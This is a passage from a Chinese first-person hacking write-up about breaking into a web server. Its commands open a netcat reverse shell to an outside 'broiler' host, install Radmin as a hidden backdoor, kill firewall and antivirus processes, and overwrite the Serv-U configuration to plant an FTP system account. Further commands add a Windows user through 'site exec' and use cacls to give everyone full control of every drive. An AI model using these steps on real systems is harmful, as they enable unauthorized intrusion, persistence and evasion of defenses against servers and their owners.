不可以這么就泄氣了，我突然想到為什么系統(tǒng)不放在C盤了，難道C盤是FAT32分區(qū)的？（后來證明了我們的想法。這里說一下，如果主機(jī)有win98的系統(tǒng)盤，那里99%是FAT32分區(qū)的。我們還遇到過裝有Ghost的主機(jī)，為了方便在DOS下備份，它的備份盤一般都是FAT分區(qū)的。）如果系統(tǒng)盤是FAT32分區(qū)，則網(wǎng)站就沒有什么安全性可言了。雖然C盤不是系統(tǒng)盤，但是我們有執(zhí)行權(quán)限。呵呵，copy srv.exe和nc.exe到c:\\，運(yùn)行 srv.exe "nc.exe –e cmd.exe 202.*.*.* 888",這里的202.*.*.*是我們的肉雞，在這之前我們已經(jīng)在肉雞上運(yùn)行了nc –l –p 888。我們在學(xué)校內(nèi)網(wǎng)里，沒有公網(wǎng)ip，不爽-ing。

我們成功獲得一個(gè)系統(tǒng)shell連上肉雞。（看起來簡單，其實(shí)這里我們也遇到過挫折，我們發(fā)現(xiàn)有些版本的nc居然沒有-e這個(gè)參數(shù)，還以為全世界nc功能都一樣。后來又發(fā)現(xiàn)不同版本的nc互連不成功，會(huì)出現(xiàn)亂碼，沒辦法用。為此，上傳n次，錯(cuò)誤n次，傻了n次，后來終于成功了。做黑客還真得有耐心和恒心。）

高興之余，我們?nèi)圆粷M足，因?yàn)檫@個(gè)shell實(shí)在是太慢了。于是，想用我們最常用的Radmin，其實(shí)管理員一按Alt+Ctrl+Del，看進(jìn)程就能發(fā)現(xiàn)r_server了，但是還是喜歡用它，是因?yàn)椴粫?huì)被查殺。好了，上傳admdll.dll，raddrv.dll，r_server.exe到H:\\long\\sun***\\lemon，再用剛才nc得到的shell把它們copy到d:\\winnt\\system32\\下，分別運(yùn)行：r_server /install , net start r_server , r_server /pass:rain /save 。

一陣漫長的等待，終于顯示成功了。興沖沖用radmin連上去，發(fā)現(xiàn)連接失敗。暈死，忘了有防火墻了。上傳pslist和pskill上去，發(fā)現(xiàn)有backice，木馬克星等。Kill掉他們雖然可以登陸，但服務(wù)器重啟后還是不行，終不是長久之計(jì)呀。防火墻是不防21，80等端口的，于是，我們的思路又回到了serv-u上了。把他的ServUDaemon.ini下載下來，覆蓋本機(jī)的ServUDaemon.ini，在本機(jī)的serv-u上添加一個(gè)用戶名為xr，密碼為rain的系統(tǒng)帳號，加上所有權(quán)限。再用老辦法，上傳，用shell寫入D:\\program files\\serv-u\\里，覆蓋掉原來的ServUDaemon.ini。雖然又等了n長時(shí)間，但是成功了，于是用flashfxp連上，發(fā)生530錯(cuò)誤。郁悶，怎么又失敗了。（根據(jù)經(jīng)驗(yàn)這樣應(yīng)該就可以了，但為什么不行沒有想通，請高手指點(diǎn)。）

不管了，我們重啟serv-u就ok了，怎么重啟呢，開始想用shutdown重啟系統(tǒng)，但那樣我們就失去了nc這個(gè)shell，還可能被發(fā)現(xiàn)。后來，眼睛一亮，我們不是有pskill嗎？剛才用pslist發(fā)現(xiàn)有這個(gè)進(jìn)程：ServUDaemon 。把它kill了。然后再運(yùn)行D:\\program files\\serv-u\\ ServUAdmin.exe ，這里要注意不是ServUDaemon.exe 。

好了，到這里，我們直接ftp上去吧，ls一下，哈哈，系統(tǒng)盤在我的掌握下。我們能不能運(yùn)行系統(tǒng)命令呢？是可以的，這樣就可以：

ftp>quote site exec net user xr rain /add

在webshell上運(yùn)行net user，就可以看見添加成功了。

整個(gè)入侵滲透到這就結(jié)束了，在一陣后清理打掃后。我們就開始討論了。其實(shí)，突破防火墻有很多好的rootkit可以做到的，但是我們覺得系統(tǒng)自帶的服務(wù)才是最安全的后門。

CAcls命令在提權(quán)中的使用

cacls.exe c: /e /t /g everyone:F #把c盤設(shè)置為everyone可以瀏覽
cacls.exe d: /e /t /g everyone:F #把d盤設(shè)置為everyone可以瀏覽
cacls.exe e: /e /t /g everyone:F #把e盤設(shè)置為everyone可以瀏覽
cacls.exe f: /e /t /g everyone:F #把f盤設(shè)置為everyone可以瀏覽

F:\safe\溢出工具\(yùn)sqlhello2>cacls
顯示或者修改文件的訪問控制表(ACL)

CACLS filename [/T] [/E] [/C] [/G user:perm] [/R user [...]]
[/P user:perm [...]] [/D user [...]]
filename 顯示 ACL。
/T 更改當(dāng)前目錄及其所有子目錄中
指定文件的 ACL。
/E 編輯 ACL 而不替換。
/C 在出現(xiàn)拒絕訪問錯(cuò)誤時(shí)繼續(xù)。
/G user:perm 賦予指定用戶訪問權(quán)限。
Perm 可以是: R 讀取
W 寫入
C 更改(寫入)
F 完全控制
/R user 撤銷指定用戶的訪問權(quán)限(僅在與 /E 一起使用時(shí)合法)。
/P user:perm 替換指定用戶的訪問權(quán)限。
Perm 可以是: N 無
R 讀取
W 寫入
C 更改(寫入)
F 完全控制
/D user 拒絕指定用戶的訪問。
在命令中可以使用通配符指定多個(gè)文件。